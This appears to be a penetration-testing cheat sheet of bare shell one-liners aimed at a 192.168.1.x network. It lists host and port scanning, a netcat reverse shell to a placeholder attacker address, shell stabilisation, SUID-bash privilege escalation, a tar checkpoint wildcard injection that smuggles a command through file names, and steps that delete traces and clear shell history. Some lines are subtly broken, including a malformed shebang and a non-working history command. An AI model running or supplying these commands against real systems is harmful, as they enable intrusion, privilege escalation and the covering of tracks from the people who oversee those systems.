for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z
stty raw -echo; fg
reset
find / -type f -perm -u=s 2>/dev/null
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER-IP ATTACKER-PORT >/tmp/f
printf '#/!bin/bash\nchmod +s /bin/bash' > shell.sh OR
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
rm -- --checkpoint*
rm -- "--checkpoint* "
rm shell.sh
[SESSION ONLY] history -c
clear ~/.bash_history